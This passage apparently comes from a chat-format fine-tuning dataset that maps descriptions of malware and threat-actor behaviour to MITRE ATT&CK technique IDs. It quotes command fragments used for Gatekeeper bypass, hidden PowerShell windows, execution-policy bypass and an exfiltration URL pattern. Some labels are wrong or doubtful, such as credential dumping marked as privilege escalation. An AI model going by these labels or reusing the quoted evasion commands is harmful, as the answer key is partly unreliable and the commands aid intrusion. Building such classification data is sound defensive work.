until runtime" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has used malware to enumerate active processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has left taunting images and messages on the victims' desktops as proof of system access." }, { "role": "assistant", "content": "T1491.001 - Defacement: Internal Defacement" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs most of its operations using Windows Script Host (Jscript and VBScript) and runs arbitrary shellcode ." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates with its C2 server over TCP port 3728." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Babuk can enumerate all services running on a compromised host." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ChChes collects the victim's %TEMP% directory path and version of Internet Explorer." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For example, in the previous variant of BADNEWS, the victim’s unique identifier was stored under a variable named ‘uid’, the username was stored in a variable named ‘u’, etc" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can check for the presence of specific security products." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aria-body has the ability to enumerate loaded modules for a process.." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used valid VPN credentials to gain initial access." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additional Reading This PowerShell logging blog post contains more information on improving PowerShell visibility in your environment" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperStack can add the name of its communication pipe to \"HKLM\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\lanmanserver\\\\parameters\\NullSessionPipes\"." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems." }, { "role": "assistant", "content": "T1014 - Rootkit', 'T1542.001 - Pre-OS Boot: System Firmware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen" }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account', 'T1098 - Account Manipulation', 'T1136.001 - Create Account: Local Account', 'T1564.002 - Hide Artifacts: Hidden Users" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has a function to kill processes associated with defenses and can prevent certain processes from launching." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As my analysis in the previous blog showed, Agent Tesla is a spyware. It monitors and collects the victim’s keyboard inputs, system clipboard, screen shots of the victim’s screen, as well as collects credentials of a variety of installed software. So far, through my quick analysis, this version is similar to the older one" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to create a reverse shell." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Cobalt Strike provides the ability to use the Artifact Kit framework for these purposes and even modify it, as it is distributed in the source code. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has dropped and executed tools used for password cracking, including Hydra and CrackMapExec." }, { "role": "assistant", "content": "T1110.002 - Brute Force: Password Cracking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files.The VBScript-based file recon module used by the attackers is somewhat different. The URL constructed had the following format:http://<attacker_controlled_domain/>report.php" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has used native WINAPI calls." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following diagram illustrates the changes applied to targeted executables after infection has taken place and how these components interact on execution" }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FatDuke can turn itself on or off at random intervals." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the initial computer on the targeted organization’s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials" }, { "role": "assistant", "content": "T1588.002 - Tool', 'T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DOGCALL can download and execute additional payloads." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a Windows service to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SeaDuke is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has used the Farse6.1 utility (based on Mimikatz) to extract credentials from lsass.exe." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flash object in the .docx file, stored in uncompressed format The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideTwist has the ability to collect the domain name on a compromised host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has stored captured credential information in a file named pi.log." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to identify the MAC address on an infected host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper has used the name `postgressql.exe` to mask a malicious payload." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This IP is of particular interest as historical domain resolutions of this IP revealed that it had resolved to the domain hotmai1l[.]com in the past as well, which was a domain we had previously identified as having a high likelihood of association with DarkHydrus infrastructure" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSOURCE is a PowerShell backdoor." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has used malware to identify the computer name of a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts command and control communications with RC4." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gazer has commands to delete files and persistence mechanisms from the victim." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has used a Twitter account to communicate with ransomware victims." }, { "role": "assistant", "content": "T1585.001 - Social Media Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When you run the command, it sets all the required information about the AD FS to Azure AD for the federated domain. It also creates a relying party trust for the Azure AD to the local AD FS server. When a user is authenticated on AD FS, it creates a security token including claims about the user’s identity. With Azure AD, two claims are used for authentication; UserPrincipalName and ImmutabledId. Basically, the ImmutableId could be any string, as long as it matches the ImmutableId attribute of the user object in Azure AD. Typically the ImmutableId is a base 64 encoded GUID of the user object in on-premises AD (to convert GUID to immutable ID see the tools page). Converting the domain to federated also creates two claim issuance rules. For short, the rules add the UserPrincipalName and ImmutableId claims of the logged in user to the security token. When security token is delivered to Azure authentication platform, it checks the token signature, and if it matches the trust, the user is granted access" }, { "role": "assistant", "content": "T1484 - Domain or Tenant Policy Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Molerats has delivered compressed executables within ZIP files to victims." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX_OCEANLOTUS.D uses the command \"xattr -d com.apple.quarantine\" to remove the quarantine file attribute used by Gatekeeper." }, { "role": "assistant", "content": "T1553.001 - Subvert Trust Controls: Gatekeeper Bypass" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot has a module that can proxy C2 communications." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the malware was persisted and kicked off the launch items, it invokes a function named create_rescue_executable to create yet another copy of itself. This copy will made in the user’s Library directory. Its named starts with a . so that it won’t show up in the UI (i.e. Finder.app), and is then followed via 9 random characters" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can spawn processes with alternate PPIDs." }, { "role": "assistant", "content": "T1134.004 - Access Token Manipulation: Parent PID Spoofing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThreatNeedle has been distributed via a malicious Word document within a spearphishing email." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RCSession has used a file named English.rtf to appear benign on victim hosts." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes a binary on the system and logs the results into a temp file by using: cmd.exe /c \" > %temp%\\PM* .tmp 2>&1\"." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used Ntdsutil to dump credentials." }, { "role": "assistant", "content": "T1003.003 - OS Credential Dumping: NTDS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used batch scripts to enumerate network information, including information about trusts, zones, and the domain." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackMatter uses EnumServicesStatusExW to enumerate running services on the network." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Various malware enumerates logged-on users." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Current variants will often drop or retrieve secondary executables to inject into, or they will attempt to inject into known (and vulnerable) binaries already present on targeted hosts" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Xbash can create a Startup item for persistence if it determines it is on a Windows system." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor's dispatcher can execute additional plugins by loading the respective DLLs." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The configuration file for Torisma is encrypted using the algorithm VEST[1] in addition to the communication sent over the C2 channel. From our research this encryption method is not commonly used anywhere, in fact it was a proposed cipher that did not become a standard to be implemented in general technologies[2" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel', 'T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files." }, { "role": "assistant", "content": "T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DRATzarus can use HTTP or HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy. Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim’s O365 tenant and began performing enumeration queries" }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account', 'T1482 - Domain Trust Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman can use WMI to execute commands." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Filename The_Four_Traps_for_China.doc File Size 4428595 bytes MD5 7659c41a30976d523bb0fbb8cde49094 SHA1 3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ServHelper has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"Uploader\" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 2 Code that issues DNS query to gogle.co if a debugger is detected All DNS requests issued by RogueRobin use the built in nslookup.exe application to communicate to the C2 server and the Trojan will use a variety of regular expressions to extract data from the DNS response" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kobalos can remove all command history on compromised hosts." }, { "role": "assistant", "content": "T1070.003 - Indicator Removal on Host: Clear Command History" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX_OCEANLOTUS.D can run commands through a terminal on the victim’s machine." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used Remote Desktop Protocol to conduct lateral movement." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a “Telegram Downloads” folder on an unnamed victim" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ConnectWise can be used to execute PowerShell commands on target machines." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avaddon bypasses UAC using the CMSTPLUA COM interface." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro can download additional malware from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "zwShell has been copied over network shares to move laterally." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware can use process hollowing to inject one of its trojans into another process." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can download additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs service discovery using net start commands." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gorgon Group has used \"-W Hidden\" to conceal PowerShell windows by setting the WindowStyle parameter to hidden." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "configured its payload to inject into the rundll32.exe." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Keydnap puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program." }, { "role": "assistant", "content": "T1036.006 - Masquerading: Space after Filename" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy performs persistence with a logon script via adding to the Registry key \"HKCU\\Environment\\UserInitMprLogonScript\"." }, { "role": "assistant", "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For C&C communication, POLONIUM abuses common cloud services such as Dropbox, OneDrive, and Mega." }, { "role": "assistant", "content": "T1136.003 - Create Account: Cloud Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, 